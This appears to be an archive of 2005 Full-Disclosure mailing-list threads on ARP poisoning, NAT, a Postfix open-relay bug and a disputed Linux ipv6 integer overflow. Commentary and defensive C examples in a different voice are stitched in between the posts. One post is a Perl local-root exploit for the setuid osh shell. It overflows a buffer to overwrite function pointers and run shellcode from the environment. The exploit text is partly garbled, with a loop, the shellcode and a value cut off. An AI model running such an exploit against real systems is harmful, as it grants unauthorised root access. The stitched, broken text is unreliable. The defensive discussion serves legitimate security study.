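               redirect_is_local(targets[i], host) ? "allow" : "302 to web root");
    return 0;
}
```

The check compares the Host: header, not a configured server name, which is what the quoted fix does; a production filter would also have to canonicalise backslashes and percent-encoding before this comparison, since browsers of that era accepted `http:\\evil` as an absolute URL.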


Re: [Full-Disclosure] Re: Cain and Abel

2005-02-07 Thread Dominik Birk
> Static ARP entries are _static_ (unchangeable) for Linux.
> For Windows, Windows XP is the first MS system that treats static as really 
> static; in previous versions "static" meant that it times out less 
> often (but could be changed).

I have tried to put some static ARP entries under WinXP. No way; they
changed all the time when you sent new ARP replies. 
How did you make the static entries? 

arp -s [dns] [mac]

My experience is that this command is not very effective.

> For other OSes? dunno.

NetBSD prints error messages when receiving new ARP replies, but doesn't
change the ARP cache.

> Piw

Dominik



Re: [Full-Disclosure] Re: Cain and Abel

2005-02-07 Thread Piw
Nick Vasiliev wrote:
> I have tried to set up static arp mappings on my system however the
> new ones overwrote the old ones. Also I am not sure but does it also
> screw with switch's arp tables or just the client ones? Any feedback
> would be nice
Yes, such an attack re-maps the port<->MAC pair in "plain" switches.
Static ARP entries are _static_ (unchangeable) for Linux.
For Windows, Windows XP is the first MS system that treats static as really 
static; in previous versions "static" meant that it times out less 
often (but could be changed).
For other OSes? Dunno.

Piw


Re: [Full-Disclosure] Re: [USN-74-1] Postfix vulnerability

2005-02-06 Thread Martin Pitt
Hi!

Wietse Venema [2005-02-05 17:09 -0500]:
> FYI,
> 
> This is a bug in a third-party IPv6 patch that is not part of Postfix.
> 
> Neither the official Postfix release nor the work-in-progress
> version is affected by this.

I am aware of this, but thanks for the notification.

The Ubuntu advisories (and in fact the advisories of all
distributions) mostly talk about packages, which do not exactly
correspond to the "official" original releases (which we
call "upstream" releases). The Ubuntu package contains the IPv6 patch,
and since it is called "postfix", I just name it like this.

Sorry for any confusion this might cause.

Have a nice day,

Martin

-- 
Martin Pitt   http://www.piware.de
Ubuntu Developerhttp://www.ubuntulinux.org
Debian GNU/Linux Developer   http://www.debian.org




Re: [Full-Disclosure] Re: [USN-74-1] Postfix vulnerability

2005-02-06 Thread Martin Pitt
Hi!

FRLinux [2005-02-06  2:08 +]:
> On Sat, 5 Feb 2005 17:09:57 -0500 (EST), Wietse Venema
> <[EMAIL PROTECTED]> wrote:
> > FYI,
> > 
> > This is a bug in a third-party IPv6 patch that is not part of Postfix.
> > 
> > Neither the official Postfix release nor the work-in-progress
> > version is affected by this.
> 
> Hello,
> 
> Does this affect the Debian version (which is v6 enabled) ?

This is already fixed in Sarge/Sid. However, I'm not sure about woody.
LaMont, does Woody already include the IPv6 patch?

Martin

-- 
Martin Pitt   http://www.piware.de
Ubuntu Developerhttp://www.ubuntulinux.org
Debian GNU/Linux Developer   http://www.debian.org




Re: [Full-Disclosure] Re: [USN-74-1] Postfix vulnerability

2005-02-05 Thread FRLinux
On Sat, 5 Feb 2005 17:09:57 -0500 (EST), Wietse Venema
<[EMAIL PROTECTED]> wrote:
> FYI,
> 
> This is a bug in a third-party IPv6 patch that is not part of Postfix.
> 
> Neither the official Postfix release nor the work-in-progress
> version is affected by this.

Hello,

Does this affect the Debian version (which is v6 enabled) ?

Steph
-- 
"Step by step, penguins are taking my sanity apart ..."


[Full-Disclosure] Re: [USN-74-1] Postfix vulnerability

2005-02-05 Thread Wietse Venema
FYI,

This is a bug in a third-party IPv6 patch that is not part of Postfix.

Neither the official Postfix release nor the work-in-progress
version is affected by this.

Wietse

Martin Pitt:
> Jean-Samuel Reynaud noticed a programming error in the IPv6 handling
> code of Postfix when /proc/net/if_inet6 is not available (which is the
> case in Ubuntu since Postfix runs in a chroot). If "permit_mx_backup"
> was enabled in the "smtpd_recipient_restrictions", Postfix turned into
> an open relay, i. e. erroneously permitted the delivery of arbitrary
> mail to any MX host which has an IPv6 address.


[Full-Disclosure] Re: Operator Shell (osh) BSS-based Buffer Overflow

2005-02-05 Thread Charles Stevenson
#!/usr/bin/perl 
###
#
# OSH 1.7 Exploit
#
# EDUCATIONAL purposes only :-)
#
# by Charles Stevenson (core) <[EMAIL PROTECTED]>
#
# Description:
# The Operator Shell (Osh) is a setuid root, security enhanced, restricted
# shell. It allows the administrator to carefully limit the access of special
# commands and files to the users whose duties require their use, while
# at the same time automatically maintaining audit records. The configuration
# file for Osh contains an administrator defined access profile for each
# authorized user or group.
#
# Problem:
# The patch for the overflows published by Steve Kemp seems lacking. If the 
# following requirements are met we can overflow within the iopen() function: 
# osh must be invoked in non-interactive mode, argv[1] must be a valid command 
# according to /etc/osh.conf (e.g. osh help $(perl -e 'print "A"x8192')). The 
# offending code can be found at main.c:305
#
#if (found) { /* It's a command, input is a string */
#  inputfp=(FILE *)1;
#  strcpy(inputstring, argv[1]); //XXX: command is copied into inputstring
#  for (i=3;i<=argc;i++) {
#   strcat(inputstring, " "); //XXX: it adds a space
#   strcat(inputstring, argv[i-1]); //XXX: and now overflow is possible
#  }
#  strcat(inputstring, "\n"); /* So it's a command */
#
# So far so good. Looking at the declaration `static char inputstring[1024];'
# we can see that overflow is indeed possible. Here's the layout of memory:
#
#+--+
#|   Memory Layout  |
#+--+
#|0x804e340|
#|0x804e344 |
#|0x804e348   |
#|0x804e34c   |
#+-(can munge everything below)-+
#|0x804e360|
#|0x804e760   |
#|0x804e764   |
#|0x804e778   |
#|0x804e780  |
#|0x804f380|
#|0x804f3a0   |
#|0x804f540  |
#|0x804f860 |
#|0x804f864 |
#+--+
#
# Table stores a bunch of function pointers to all the routines whether
# internally implemented or called via execv. So I decided to try and
# overwrite the first entry with the address of my shellcode. There were
# several obstacles in between me and my rootshell though. First was a
# loop that performed strcmp's on AliasList items. Rather than fill that
# out I found that I could conveniently set AliasCounter to -1 and skip
# the loop entirely. Next I found that if argv[1] was a builtin command
# and NUMENTRY was a positive integer I could set Table[0].prog_name to match
# argv[1] and it'd call Table[0].handler (So I found "exit" in the executable
# itself thanks to `static struct hand Internal[]'). From main.c:1032
#
#  while (i\n\n";

# Clear out the environment. 
foreach $key (keys %ENV) { delete $ENV{$key}; } 

# Setup simple env so ret is easier to guess
$ENV{"HELLCODE"} = "$sc"; 
$ENV{"TERM"} = "linux"; 
$ENV{"PATH"} = "/usr/local/bin:/usr/bin:/bin"; 

# Create the payload...
$egg = "&"x1019 . # pad up to NUMENTRY
   pack("l",0x01d5c001) . # overwrite with a positive int
   "&"x20 .   # ampersand gets pas TTOOLONG
   pack("l",0x) . # AliasCounter = -1 skips for loop
   "core" .   # shameless self-promotion
   $exit_addy .   # address of "exit"
   pack("l",0xbe30) . # address of shellcode in ENV
   $exit_addy;# address of a NULL terminated string
system("/usr/sbin/osh exit '$egg'"); 

# EOF

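The defect quoted from main.c is an unbounded strcpy/strcat chain into the fixed `static char inputstring[1024]`, so the overflow size is simply the joined length of the arguments. As an added example, not osh's code and not part of the post, here is that loop rewritten in C with a length check that refuses input which would not fit, next to a function that computes the byte count the original loop would write; the `osh help $(perl -e 'print "A"x8192')` trigger from the post is reproduced in `demo_help_8192`. Function names are mine.

```c
#include <stdio.h>
#include <string.h>

#define INPUTLEN 1024   /* osh: static char inputstring[1024] */

/* Bytes the original strcpy/strcat sequence writes for a given argv
 * (argc >= 2 assumed): argv[1], then " " + argv[i] for i = 2..argc-1,
 * then "\n" and the terminating NUL. */
size_t osh_needed_len(int argc, char **argv)
{
    size_t n = strlen(argv[1]);
    for (int i = 2; i < argc; i++)
        n += 1 + strlen(argv[i]);
    return n + 2;
}

/* Bounded replacement for that sequence. Returns 0 and fills `out`, or -1
 * (leaving `out` untouched) when the joined command would not fit, which is
 * exactly the case the original code lets run off the end of the array. */
int osh_build_input(char *out, size_t outlen, int argc, char **argv)
{
    if (argc < 2 || osh_needed_len(argc, argv) > outlen)
        return -1;
    size_t pos = (size_t)snprintf(out, outlen, "%s", argv[1]);
    for (int i = 2; i < argc; i++)
        pos += (size_t)snprintf(out + pos, outlen - pos, " %s", argv[i]);
    snprintf(out + pos, outlen - pos, "\n");
    return 0;
}

/* The trigger from the post, osh help $(perl -e 'print "A"x8192'):
 * returns how many bytes the original loop would write into inputstring. */
size_t demo_help_8192(void)
{
    static char big[8193];              /* constructed argument */
    memset(big, 'A', 8192);
    big[8192] = '\0';
    char *av[] = {"osh", "help", big, NULL};
    return osh_needed_len(3, av);       /* 8199 against a 1024-byte buffer */
}

int main(void)
{
    char *av[] = {"osh", "help", "me", NULL};   /* constructed argv */
    char inputstring[INPUTLEN];
    int rc = osh_build_input(inputstring, sizeof inputstring, 3, av);
    printf("'help me' needs %zu bytes, rc=%d, inputstring=%s",
           osh_needed_len(3, av), rc, rc == 0 ? inputstring : "(unset)\n");
    printf("8192 x 'A' needs %zu bytes; the buffer holds %d\n",
           demo_help_8192(), INPUTLEN);
    return 0;
}
```

Refusing the input outright, rather than truncating it, is the safer choice for a setuid shell: a silently truncated command line could still be a valid command with a different meaning.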


[Full-Disclosure] Re: [Linux kernel ipv6_setsockopt integer overflow]

2005-02-04 Thread qobaiashi
On Thursday, 3 February 2005 22:47, Dan Yefimov wrote:
> On Thu, 3 Feb 2005, qobaiashi wrote:
>
> There's no integer overflow here since there's the test for optlen < 0 in
> linux/net/socket.c

Good grief! You're right ... I'm sure it wasn't there when I was 
looking for it :)

...thx
-- 

-q/UNF


RE: [Full-Disclosure] Re: NAT router inbound network traffic subversion

2005-02-04 Thread fd
This topic is debated once every 12 months on the firewall-wizards list -
you could check the archives there.

You cannot get a packet in from the outside on PAT (port translated NAT, NAT
overload, etc) to a client that is idle. Actually, that may be a lie given
that there used to be a bunch of crappy NAT equipment that would accept
packets addressed to the correct internal IP, but that mostly doesn't happen
anymore, and it's an implementation thing. 

This is the part that could be considered a security feature, since it is
the only real incremental security compared to connecting directly. 

You talk about this being 'intractable' rather than 'impossible'. This isn't
correct. It is genuinely impossible in a reference implementation, since
there is no state entry to allow the traffic, and traffic not allowed is
denied. In real life that gets blurry. NAT entries that don't get torn down,
dumb implementations that remember too much of their routing roots, overload
behaviour etc could mean that you might find a way to do it on a certain
box, but the basic behaviour is axiomatic.

You can attack existing connections - DNS spoofing, blind TCP MitM (or not
blind if you're close enough), UDP packet injection in general. These are
all a class of attack exploiting the simplicity of NAT states
(internalIP:internalPort->onesingleIP:Port), but they require a spoofable
protocol.

Basically, those attacks are not all that much harder or easier than if the
connection did not use NAT, and rely on most of the same conditions,
including the ability to sniff the connection to have any real chance of
blind TCP MitM. NAT adds an additional barrier if you actually care which
machine you are attacking, and some of the previous people have sent links
to the various ipid and other techniques to work out who is who from the
outside.

morning_wood's scenario is neither more nor less difficult / likely,
irrespective of the presence of NAT; it works but is orthogonal to the NAT
security issue. Mostly the same for Mark Senior's excellent DNS response
injection example (although if that attack is carried out blind there is an
extra complication because the client source port will often be changed by a
PAT router).

Cheers,

ben

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Kristian Hermansen
> Sent: Friday, January 28, 2005 4:37 PM
> To: full-disclosure@lists.netsys.com
> Subject: [Full-Disclosure] Re: NAT router inbound network 
> traffic subversion
> 
> I think the answers that I received in response to my query 
> are somewhat
> obvious -- yes -- but neither answered my question!  Morning Wood's
> analysis was brilliant as ever, like always ;-P
> 
> "attacker now can do as he wishes to the rest of your network ( GAME
> OVER )"
> 
> Ummm...okay.  The problem with you was this statement:
> 
> "NAT client browses web..."
> 
> HOW IS THIS NOT USER INTERACTION?!?!?  I asked if there is a 
> computer on
> the internal network that doesn't do anything -- that means SENDING NO
> PACKETS to the router -- if an attacker can get EVEN ONE 
> PACKET inside:
> then they will prove everyone wrong, right?  If one packet can get
> through, it can be considered a rogue packet that should not have
> entered the internal network destined for a particular host 
> -- or better
> yet -- an internal broadcast address going to all hosts.
> 
> Some say getting these rogue packets into the network is "impossible".
> That is the reason for my question.  I like to think that 
> most problems
> are "intractable", but not "impossible".  Can anyone prove me wrong?
> Can someone push a rogue packet behind a router with no client
> interaction???  This is my chautauqua...
> -- 
> Kristian Hermansen <[EMAIL PROTECTED]>
> 



[Full-Disclosure] Re: [Linux kernel ipv6_setsockopt integer overflow]

2005-02-04 Thread Dan Yefimov
On Thu, 3 Feb 2005, qobaiashi wrote:

There's no integer overflow here since there's the test for optlen < 0 in 
linux/net/socket.c

> 
> there exists an integer bug in the ipv6 implementation of the linux kernel.
> (at least in 2.4.20 and 2.6.4 )
> in /linux/net/ipv6/ipv6_sockglue.c:
> 
> 
> int ipv6_setsockopt(struct sock *sk, int level, int optname, char *optval,
>int optlen)
> {
> struct ipv6_pinfo *np = inet6_sk(sk);
> int val, valbool;
> int retv = -ENOPROTOOPT;
> 
> if (level == SOL_IP && sk->sk_type != SOCK_RAW)
> return udp_prot.setsockopt(sk, level, optname, optval,optlen);
> 
> if(level!=SOL_IPV6)
> goto out;
> 
> if (optval == NULL)
> val=0;
> else if (get_user(val, (int *) optval))
> return -EFAULT;
> 
> valbool = (val!=0);
> 
> lock_sock(sk);
> 
> switch (optname) {
>  [...]
> 
>  case IPV6_PKTOPTIONS:
> {
> struct ipv6_txoptions *opt = NULL;
> struct msghdr msg;
> struct flowi fl;
> int junk;
> 
> fl.fl6_flowlabel = 0;
> fl.oif = sk->sk_bound_dev_if;
> 
> [1]if (optlen == 0)
> goto update;
> 
> /* 1K is probably excessive
>  * 1K is surely not enough, 2K per standard header is 16K.
>  */
> retv = -EINVAL;
> [2] if (optlen > 64*1024) 
> break;
> 
> [3]opt = sock_kmalloc(sk, sizeof(*opt) + optlen, GFP_KERNEL);
> retv = -ENOBUFS; sizeof(*opt)+0xfff8
> if (opt == NULL)
> break;
> 
> [4]memset(opt, 0, sizeof(*opt));
> opt->tot_len = sizeof(*opt) + optlen;
> retv = -EFAULT;
> [5]if (copy_from_user(opt+1, optval, optlen))
> [...]
> 
> details:
> 
> Conditions [1] and [2] are easily passed with a value like -100; then at [3] 
> sock_kmalloc allocates a too-small object of size (sizeof(*opt) + (-100)),
> which is then overflowed in [4] and [5], leading to a DoS of the kernel...
> 
> that's it 
> over and out!
> 
> 

-- 

Sincerely Your, Dan.

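Dan's point is that the sign check sits one layer up, in net/socket.c, before ipv6_setsockopt() ever sees optlen, so the two tests visible in the quoted snippet never face a negative value. As an added example (not kernel code; the struct is a stand-in whose size is my assumption, and the function and enum names are mine), here is the control flow of the quoted IPV6_PKTOPTIONS path traced for one optlen, with and without that outer guard, which shows why -100 slips past checks [1] and [2] on its own but is rejected earlier in practice.

```c
#include <stdio.h>
#include <stddef.h>

/* Stand-in for struct ipv6_txoptions; its real size is not the point, only
 * that sizeof(*opt) bytes get memset() after an allocation sized from optlen. */
struct ipv6_txoptions_stub { char body[40]; };

enum pktoptions_outcome {
    PO_REJECTED_IN_SOCKET_C = 0, /* optlen < 0 caught in net/socket.c */
    PO_UPDATE_ONLY          = 1, /* [1] optlen == 0: goto update */
    PO_EINVAL               = 2, /* [2] optlen > 64K */
    PO_UNDERSIZED_ALLOC     = 3, /* [3]/[4] would write past the object */
    PO_OK                   = 4
};

/* Trace the quoted IPV6_PKTOPTIONS path for one optlen. With
 * socket_layer_guard = 0 only the checks visible in the quoted snippet run;
 * with 1 the sys_setsockopt() sign check Dan refers to runs first. */
int pktoptions_outcome(int optlen, int socket_layer_guard)
{
    if (socket_layer_guard && optlen < 0)
        return PO_REJECTED_IN_SOCKET_C;
    if (optlen == 0)                            /* [1] */
        return PO_UPDATE_ONLY;
    if (optlen > 64 * 1024)                     /* [2]: -100 passes this */
        return PO_EINVAL;
    /* [3] sock_kmalloc(sk, sizeof(*opt) + optlen, ...) takes its size as int */
    int alloc_size = (int)sizeof(struct ipv6_txoptions_stub) + optlen;
    /* [4] memset(opt, 0, sizeof(*opt)) needs the whole struct to exist */
    if (alloc_size < (int)sizeof(struct ipv6_txoptions_stub))
        return PO_UNDERSIZED_ALLOC;
    return PO_OK;
}

int main(void)
{
    const int samples[] = {-100, -8, 0, 256, 64 * 1024 + 1};  /* constructed */
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("optlen=%6d  snippet-only=%d  with socket.c guard=%d\n",
               samples[i],
               pktoptions_outcome(samples[i], 0),
               pktoptions_outcome(samples[i], 1));
    return 0;
}
```

The general lesson is the one the thread lands on: a `len > MAX` test on a signed length is only half a bounds check, and whether the missing `len < 0` half exists somewhere on the call path has to be verified, not assumed.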


Re: [Full-Disclosure] Re: Cain and Abel

2005-02-03 Thread Ill will
There are a few programs to detect ARP poisoning, e.g. Ethereal can detect
the huge amount of traffic flow. There's a Windows app, winarpwatch
http://www.arp-sk.org/files/related/warpwatch.zip
that is a Windows clone of the *nix program arpwatch, which basically
checks to see if your ARP cache has changed.
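The check arpwatch (and the winarpwatch clone mentioned above) performs is to remember which MAC each IP has been seen with and to raise an alarm when a known IP turns up with a different one, which is exactly what a Cain or Ettercap poisoning run produces. As an added example in C, not arpwatch's code and not from the post, here is that detector run over constructed Ethernet/ARP frames: the gateway answers a victim twice, then an attacker claims the gateway's IP with its own MAC. The function names, MAC and IP addresses are my own.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define MAX_HOSTS 64
#define FRAME_LEN 42      /* 14-byte Ethernet header + 28-byte ARP */

struct arp_entry { uint8_t ip[4]; uint8_t mac[6]; };
static struct arp_entry table[MAX_HOSTS];
static int table_len;

void arp_table_reset(void) { table_len = 0; }

/* Feed one Ethernet frame. Bindings are learned from the ARP *sender*
 * fields of both requests and replies, as arpwatch does. Returns
 *   0  ignored (not IPv4-over-Ethernet ARP) or new binding learned
 *   1  known IP, same MAC as before
 *  -1  known IP, DIFFERENT MAC: the signature of ARP poisoning */
int arp_observe(const uint8_t *frame, size_t len)
{
    if (len < FRAME_LEN || frame[12] != 0x08 || frame[13] != 0x06)
        return 0;
    const uint8_t *arp = frame + 14;
    /* htype 1 (Ethernet), ptype 0x0800 (IPv4), hlen 6, plen 4 */
    if (arp[0] != 0 || arp[1] != 1 || arp[2] != 0x08 || arp[3] != 0x00 ||
        arp[4] != 6 || arp[5] != 4)
        return 0;
    unsigned oper = (arp[6] << 8) | arp[7];
    if (oper != 1 && oper != 2)
        return 0;
    const uint8_t *sha = arp + 8, *spa = arp + 14;
    if (memcmp(spa, "\0\0\0\0", 4) == 0)   /* address probe, no binding */
        return 0;
    for (int i = 0; i < table_len; i++) {
        if (memcmp(table[i].ip, spa, 4) == 0)
            return memcmp(table[i].mac, sha, 6) == 0 ? 1 : -1;
    }
    if (table_len < MAX_HOSTS) {
        memcpy(table[table_len].ip, spa, 4);
        memcpy(table[table_len].mac, sha, 6);
        table_len++;
    }
    return 0;
}

/* Build a constructed ARP frame (oper 1 = request, 2 = reply) into buf. */
size_t build_arp(uint8_t *buf, unsigned oper, const uint8_t *sha,
                 const uint8_t *spa, const uint8_t *tha, const uint8_t *tpa)
{
    memset(buf, 0, FRAME_LEN);
    memcpy(buf, tha, 6);            /* Ethernet dst */
    memcpy(buf + 6, sha, 6);        /* Ethernet src */
    buf[12] = 0x08; buf[13] = 0x06; /* EtherType ARP */
    uint8_t *a = buf + 14;
    a[1] = 1; a[2] = 0x08;          /* htype=1, ptype=0x0800 */
    a[4] = 6; a[5] = 4;
    a[6] = (uint8_t)(oper >> 8); a[7] = (uint8_t)oper;
    memcpy(a + 8, sha, 6); memcpy(a + 14, spa, 4);
    memcpy(a + 18, tha, 6); memcpy(a + 24, tpa, 4);
    return FRAME_LEN;
}

/* Constructed scenario: the gateway 192.168.1.1 answers a victim twice,
 * then an attacker replies claiming 192.168.1.1 with its own MAC.
 * Returns the verdict for the attacker's frame (-1 if detected). */
int demo_gateway_spoof(void)
{
    static const uint8_t gw_mac[6]  = {0x00,0x11,0x22,0x33,0x44,0x55};
    static const uint8_t vic_mac[6] = {0x00,0xaa,0xbb,0xcc,0xdd,0xee};
    static const uint8_t bad_mac[6] = {0xde,0xad,0xbe,0xef,0x00,0x01};
    static const uint8_t gw_ip[4]  = {192,168,1,1};
    static const uint8_t vic_ip[4] = {192,168,1,10};
    uint8_t f[FRAME_LEN];
    arp_table_reset();
    int r1 = arp_observe(f, build_arp(f, 2, gw_mac, gw_ip, vic_mac, vic_ip));
    int r2 = arp_observe(f, build_arp(f, 2, gw_mac, gw_ip, vic_mac, vic_ip));
    int r3 = arp_observe(f, build_arp(f, 2, bad_mac, gw_ip, vic_mac, vic_ip));
    if (r1 != 0 || r2 != 1)
        return 99;                  /* scenario did not unfold as expected */
    return r3;
}

int main(void)
{
    printf("attacker frame verdict: %d (-1 = binding changed)\n",
           demo_gateway_spoof());
    return 0;
}
```

The detector is only as good as its first sighting: like arpwatch, it trusts whatever binding it learns first, so it should be started on a quiet network or seeded from a known-good table, and it reports but does not block, which is why the thread's other half (static entries, switch port security) is still needed.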


[Full-Disclosure] Re: Cain and Abel

2005-02-03 Thread J. Oquendo

On Thu, 3 Feb 2005, Paul Melson wrote:

> A more manageable defense against ARP poisoning attacks is to configure your
> switches to prevent against MAC address spoofing.  Cisco switches, for
> example, can statically map the MAC address of the interface connected to a
> given port (good for servers), as well as limit the number of MAC addresses
> that can appear on a given port (good for workstations, conference rooms,
> hotel rooms, etc.).

802.1q and Cisco PVLANs will suffice by segmentation to minimize the
effects of programs like Cain and Abel. However, most people forget that
at the core level any product be it a switch (layer 2 or 3) or router will
still have to listen for broadcasts in order to get MAC information to
delegate traffic. If someone just wanted to sit there and DoS your ARP
tables to oblivion it wouldn't be hard. VLAN tagging has its insecurities
as well. You could likely just roast someone's connection if you're on
their segment as well via spoofing however you're limited to that segment.

http://infiltrated.net/cisco/pvlans.html
http://infiltrated.net/cisco/vlan-insecurities.html
http://infiltrated.net/cisco/vlan-tagging-101.html
http://infiltrated.net/cisco/vla-tagging.pdf

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x0D99C05C
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x0D99C05C

sil @ infiltrated . net http://www.infiltrated.net

"How a man plays the game shows something of his
character - how he loses shows all" - Mr. Luckey


RE: [Full-Disclosure] Re: Cain and Abel

2005-02-03 Thread Paul Melson
Under a default or "dumb" switched environment, both the switch and the
victim hosts will digest the phony ARP broadcasts sent by tools like Cain or
Ettercap.  Static ARP entries on a server should be enough to prevent
session hijacking, but in order to stop eavesdropping, both victims need
static ARP entries.  Of course, if you're finding that your static ARP
entries are being overwritten by the phony broadcasts, that's something your
vendor needs to know about.

A more manageable defense against ARP poisoning attacks is to configure your
switches to prevent against MAC address spoofing.  Cisco switches, for
example, can statically map the MAC address of the interface connected to a
given port (good for servers), as well as limit the number of MAC addresses
that can appear on a given port (good for workstations, conference rooms,
hotel rooms, etc.).  More info specific to Cisco switches here:

http://www.cisco.com/en/US/products/hw/switches/ps4324/products_configuration_guide_chapter09186a0080379add.html

PaulM

PS - You may find that certain clustering/HA products will use multiple MAC
addresses and thus give you headaches in conjunction with Cisco port
security configurations.

____

Subject: [Full-Disclosure] Re: Cain and Abel

Hi, I have been reading this list for some time now. Haven't contributed
much because I am still learning but recently stumbled into a security issue
that bothered me. A friend of mine showed me Cain and Abel, after giving it
a few runs on my network the results were scary. I have been trying to find
a decent solution on how to prevent the man in the middle attack with it
however I wasn't able to come up with a good working solution. I have tried
to set up static arp mappings on my system however the new ones overwrote
the old ones. Also I am not sure but does it also screw with switch's arp
tables or just the client ones? Any feedback would be nice




Re: [Full-Disclosure] Re: Cain and Abel

2005-02-03 Thread Honza Vlach
Install OS that knows that static means really static (e.g. != Windows )

Have fun,
Honza Vlach

-- 
-BEGIN GEEK CODE BLOCK-
Version: 3.12
GIT/CS d- s: a-- C$ ULS$ P L+++ E--- W- N+ o? K? w-->--- O? M->+ V? PS 
PE Y++ PGP+++ !t 5? X++ R tv-- b++ DI+ D++ G+>+++ e h--- r++ y?
--END GEEK CODE BLOCK--
()  ascii ribbon campaign - against html mail 
/\- against microsoft attachments





[Full-Disclosure] Re: Cain and Abel

2005-02-03 Thread Nick Vasiliev
Hi, I have been reading this list for some time now. Haven't contributed
much because I am still learning but recently stumbled into a security issue
that bothered me. A friend of mine showed me Cain and Abel, after giving it
a few runs on my network the results were scary. I have been trying to find
a decent solution on how to prevent the man in the middle attack with it
however I wasn't able to come up with a good working solution. I have tried
to set up static arp mappings on my system however the new ones overwrote
the old ones. Also I am not sure but does it also screw with switch's arp
tables or just the client ones? Any feedback would be nice

